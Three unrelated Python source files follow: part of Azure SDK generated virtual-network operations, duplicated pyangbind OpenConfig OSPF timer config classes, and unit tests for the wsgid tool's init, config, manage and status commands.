:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IPAddressAvailabilityResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
# Construct URL
url = self.check_ip_address_availability.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['ipAddress'] = self._serialize.query("ip_address", ip_address, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('IPAddressAvailabilityResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_ip_address_availability.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/CheckIPAddressAvailability'} # type: ignore
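    # Illustrative usage sketch (not part of the generated module): checking whether a
    # private address is free inside the virtual network. The result exposes
    # `available` and, when the address is taken, suggested alternatives; `client` and
    # all names below are placeholders.
    #
    #   result = client.virtual_networks.check_ip_address_availability(
    #       "example-rg", "example-vnet", ip_address="10.0.0.4"
    #   )
    #   print(result.available, result.available_ip_addresses)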
def list_usage(
self,
resource_group_name, # type: str
virtual_network_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.VirtualNetworkListUsageResult"]
"""Lists usage stats.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param virtual_network_name: The name of the virtual network.
:type virtual_network_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualNetworkListUsageResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_06_01.models.VirtualNetworkListUsageResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualNetworkListUsageResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-06-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_usage.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'virtualNetworkName': self._serialize.url("virtual_network_name", virtual_network_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualNetworkListUsageResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_usage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/virtualNetworks/{virtualNetworkName}/usages'} # type: ignore
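# Illustrative helper (not part of the generated module): a minimal end-to-end sketch
# showing how the operations in the class above are reached through the public
# management client. Assumes azure-identity and azure-mgmt-network are installed;
# the resource names are placeholders, and nothing runs unless the helper is called.
def _example_list_virtual_network_usage(subscription_id, resource_group, vnet_name):
    from azure.identity import DefaultAzureCredential
    from azure.mgmt.network import NetworkManagementClient

    client = NetworkManagementClient(DefaultAzureCredential(), subscription_id)
    # list_usage() returns an ItemPaged that lazily follows the nextLink field.
    for usage in client.virtual_networks.list_usage(resource_group, vnet_name):
        print(usage.current_value, usage.limit)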
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/global/timers/lsa-generation/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to the generation of
LSAs by the local system
"""
__slots__ = ("_path_helper", "_extmethods", "__initial_delay", "__maximum_delay")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"global",
"timers",
"lsa-generation",
"config",
]
def _get_initial_delay(self):
"""
Getter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
return self.__initial_delay
def _set_initial_delay(self, v, load=False):
"""
Setter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_initial_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_initial_delay() directly.
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """initial_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="initial-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__initial_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_initial_delay(self):
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
def _get_maximum_delay(self):
"""
Getter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
return self.__maximum_delay
def _set_maximum_delay(self, v, load=False):
"""
Setter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_delay() directly.
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """maximum_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="maximum-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__maximum_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_maximum_delay(self):
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
initial_delay = __builtin__.property(_get_initial_delay, _set_initial_delay)
maximum_delay = __builtin__.property(_get_maximum_delay, _set_maximum_delay)
_pyangbind_elements = OrderedDict(
[("initial_delay", initial_delay), ("maximum_delay", maximum_delay)]
)
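# Illustrative usage sketch (not part of the generated bindings): the class above
# exposes initial_delay and maximum_delay as validated properties, so a caller can do:
#
#   c = config()
#   c.initial_delay = 500          # accepted: within the uint32 range 0..4294967295
#   c.maximum_delay = 5000
#   print(int(c.initial_delay), int(c.maximum_delay))
#   c.initial_delay = 2 ** 32      # out of range: raises ValueError from the setter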
class config(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/ospfv2/global/timers/lsa-generation/config. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Configuration parameters relating to the generation of
LSAs by the local system
"""
__slots__ = ("_path_helper", "_extmethods", "__initial_delay", "__maximum_delay")
_yang_name = "config"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"global",
"timers",
"lsa-generation",
"config",
]
def _get_initial_delay(self):
"""
Getter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
return self.__initial_delay
def _set_initial_delay(self, v, load=False):
"""
Setter method for initial_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/initial_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_initial_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_initial_delay() directly.
YANG Description: The value of this leaf specifies the time between the first
time an LSA is generated and advertised and the subsequent
generation of that LSA.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """initial_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="initial-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__initial_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_initial_delay(self):
self.__initial_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="initial-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
def _get_maximum_delay(self):
"""
Getter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
return self.__maximum_delay
def _set_maximum_delay(self, v, load=False):
"""
Setter method for maximum_delay, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/global/timers/lsa_generation/config/maximum_delay (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_delay is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_delay() directly.
YANG Description: The value of this leaf specifies the maximum time between the
generation of an LSA and the subsequent re-generation of that
LSA. This value is used in implementations that support
increasing delay between generation of an LSA
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """maximum_delay must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="maximum-delay", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=True)""",
}
)
self.__maximum_delay = t
if hasattr(self, "_set"):
self._set()
def _unset_maximum_delay(self):
self.__maximum_delay = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="maximum-delay",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=True,
)
initial_delay = __builtin__.property(_get_initial_delay, _set_initial_delay)
maximum_delay = __builtin__.property(_get_maximum_delay, _set_maximum_delay)
_pyangbind_elements = OrderedDict(
[("initial_delay", initial_delay), ("maximum_delay", maximum_delay)]
)
|
|
import unittest
from wsgid.commands import *
from wsgid.test import FakeOptions, fullpath
import os
import sys
import simplejson
from mock import patch, Mock
import signal
ROOT_PATH = fullpath(__file__)
FIXTURES_PATH = os.path.join(ROOT_PATH, 'fixtures')
APP_PATH = os.path.join(FIXTURES_PATH, "newapp")
#Generates a fresh full path for the given app_name
def new_app_path(app_name):
return os.path.join(FIXTURES_PATH, app_name)
class CommandInitTest(unittest.TestCase):
def setUp(self):
self.init = CommandInit()
self.opt = FakeOptions(app_path=APP_PATH)
'''
    If the --app-path does not exist, create it.
'''
@patch('sys.stderr')
    def test_create_root_folder_if_not_exists(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(APP_PATH), "Did not create the app root folder")
@patch('sys.stderr')
def test_create_pid_structure(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid")), "Did not create pid folder")
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/master")), "Did not create master pid folder")
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/worker")), "Did not create workers pid folder")
@patch('sys.stderr')
def test_create_log_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "logs")), "Did not create logs folder")
@patch('sys.stderr')
def test_create_app_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "app")), "Did not create app folder")
@patch('sys.stderr')
def test_create_plugins_dir(self, *args):
self.init.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "plugins")), "Did not create app folder")
'''
Checks there is no problem if we run "init" on an already
inited path
'''
@patch('sys.stderr')
def test_init_an_already_inited_path(self, *args):
self.init.run(FakeOptions(app_path=APP_PATH))
os.system("rm -rf {0}".format(os.path.join(APP_PATH, 'pid')))
self.init.run(FakeOptions(app_path=APP_PATH))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "app")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "logs")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/master")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "pid/worker")))
self.assertTrue(os.path.exists(os.path.join(APP_PATH, "plugins")), "plugins dir should exist")
class CommandConfigTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.config = CommandConfig()
self.init = CommandInit()
self.CLEAN_PATH = os.path.join(FIXTURES_PATH, 'clean-path')
self.opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var',
django=False)
self.init.run(self.opt)
'''
    If ${app-path}/wsgid.json does not exist, create it.
'''
def test_create_json_if_not_exist(self):
self.config.run(self.opt)
self.assertTrue(os.path.exists(os.path.join(self.CLEAN_PATH, "wsgid.json")))
'''
An option passed on the command line, overrides the same option in the
config file.
'''
def test_override_option(self):
        # Write a config file so we can override some options
f = file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "w+")
simplejson.dump({"recv": "tcp://127.0.0.1:3000", "debug": "True", "workers": 8, "chroot": "True"}, f)
f.close()
# Here we override some options
self.opt.recv ="tcp://127.0.0.1:4000"
self.opt.workers = 8
self.opt.chroot = None
# Run the config command
self.config.run(self.opt)
# Check that the options passed on the command line are the new config options
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("tcp://127.0.0.1:4000", h['recv'])
self.assertEquals("True", h['debug'])
self.assertEquals(8, h['workers'])
self.assertEquals("True", h['chroot']) # An option nos passed on the command line should remain on the config file
def test_create_all_options(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.config.run(opt)
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("app.frontends.wsgi.application", h['wsgi_app'])
self.assertEquals("True", h['debug'])
self.assertEquals(8, h['workers'])
self.assertEquals("True", h['keep_alive'])
self.assertEquals("True", h['chroot'])
self.assertEquals("True", h['no_daemon'])
self.assertEquals("tcp://127.0.0.1:7000", h['recv'])
self.assertEquals("tcp://127.0.0.1:7001", h['send'])
self.assertEquals("/var/www", h['mongrel2_chroot'])
self.assertEquals("True", h['django'])
def test_validate_recv(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp//127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.assertRaises(Exception, self.config.run, opt)
def test_validate_send(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp:/127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.assertRaises(Exception, self.config.run, opt)
'''
    The no_debug option is an extra option added by the config command.
'''
def test_disable_boolean_option(self):
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
no_debug=True, debug=True, workers=9, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",
no_chroot=False, no_keep_alive=False, no_daemon = False, mongrel2_chroot = '/var',
django=False)
self.config.run(opt)
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("app.frontends.wsgi.application", h['wsgi_app'])
self.assertEquals("False", h['debug'])
class CommandManageTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.init = CommandInit()
self.manage = CommandManage()
self.opt = FakeOptions(app_path=APP_PATH, send_signal=signal.SIGTERM)
self.init.run(self.opt)
def test_match_command_names_matches(self):
self.assertTrue(self.manage.name_matches('stop'))
self.assertTrue(self.manage.name_matches('restart'))
self.assertFalse(self.manage.name_matches('start'))
def test_command_name(self):
self.assertEquals('restart, stop', self.manage.command_name())
def test_run_stop_command(self):
open(os.path.join(APP_PATH, "pid/master/2968.pid"), "w")
open(os.path.join(APP_PATH, "pid/master/9847.pid"), "w")
with patch('os.kill'):
self.manage.run(self.opt, command_name = 'stop')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((9847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((2968, 15), {}) in os.kill.call_args_list)
def test_run_restart_command(self):
open(os.path.join(APP_PATH, "pid/worker/3847.pid"), "w")
open(os.path.join(APP_PATH, "pid/worker/4857.pid"), "w")
with patch('os.kill'):
self.manage.run(self.opt, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((3847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((4857, 15), {}) in os.kill.call_args_list)
@patch('sys.stderr')
def test_send_custom_signal(self, *args):
apppath = new_app_path('custom-signal')
opts = FakeOptions(app_path=apppath, send_signal=9)
self.init.run(opts)
open(os.path.join(apppath, "pid/master/3847.pid"), "w")
open(os.path.join(apppath, "pid/worker/3690.pid"), "w")
with patch('os.kill'):
self.manage.run(opts, command_name = 'stop')
self.manage.run(opts, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
#Check that we sent SIGKILL
self.assertEquals( [((3847, 9), {}), ((3690, 9), {})], os.kill.call_args_list)
def test_kill_already_dead_pid(self):
open(os.path.join(APP_PATH, "pid/worker/3847.pid"), "w")
open(os.path.join(APP_PATH, "pid/worker/4857.pid"), "w")
with patch('os.kill'):
os.kill = Mock(side_effect=OSError("No such process"))
self.manage.run(self.opt, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((3847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((4857, 15), {}) in os.kill.call_args_list)
'''
Check that wsgid does not crash if we have invalid pid files
'''
@patch('sys.stderr')
def test_invalid_pid_files(self, *args):
new_path = os.path.join(FIXTURES_PATH, 'crash-app')
opts = FakeOptions(app_path=new_path, send_signal=signal.SIGTERM)
self.init.run(opts)
open(os.path.join(new_path, "pid/worker/crash.pid"), "w")
with patch('os.kill'):
self.manage.run(opts, command_name = 'restart')
self.assertEquals(0, os.kill.call_count)
class CommandStatusTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.init = CommandInit()
self.manage = CommandManage()
self.new_path = os.path.join(FIXTURES_PATH, 'status-command')
self.opt = FakeOptions(app_path=self.new_path, send_signal=signal.SIGTERM)
self.init.run(self.opt)
def test_command_name(self):
self.assertEquals('status', CommandStatus().command_name())
def test_command_name_matches(self):
self.assertTrue(CommandStatus().name_matches('status'))
self.assertFalse(CommandStatus().name_matches('ostatus'))
def test_list_master_pids(self):
        with patch('os.kill'): # So os.kill reports any pid as "running"
with patch('sys.stdout'):
open(os.path.join(self.new_path, "pid/master/3847.pid"), "w")
open(os.path.join(self.new_path, "pid/worker/4857.pid"), "w")
CommandStatus().run(self.opt)
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Running\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): 4857\n",), {})], sys.stdout.write.call_args_list)
def test_list_worker_pids(self):
path = os.path.join(FIXTURES_PATH, 'worker-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('os.kill'): #So os.kill reports any pid as "running"
with patch('sys.stdout'):
open(os.path.join(path, "pid/worker/3847.pid"), "w")
open(os.path.join(path, "pid/worker/3948.pid"), "w")
open(os.path.join(path, "pid/worker/4857.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Running\n",), {}),
(("Master pid(s): \n",), {}),
(("Worker pid(s): 3847, 3948, 4857\n",), {})], sys.stdout.write.call_args_list)
def test_status_when_no_worker_pids(self):
path = os.path.join(FIXTURES_PATH, 'noworker-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('sys.stdout'):
open(os.path.join(path, "pid/master/3847.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
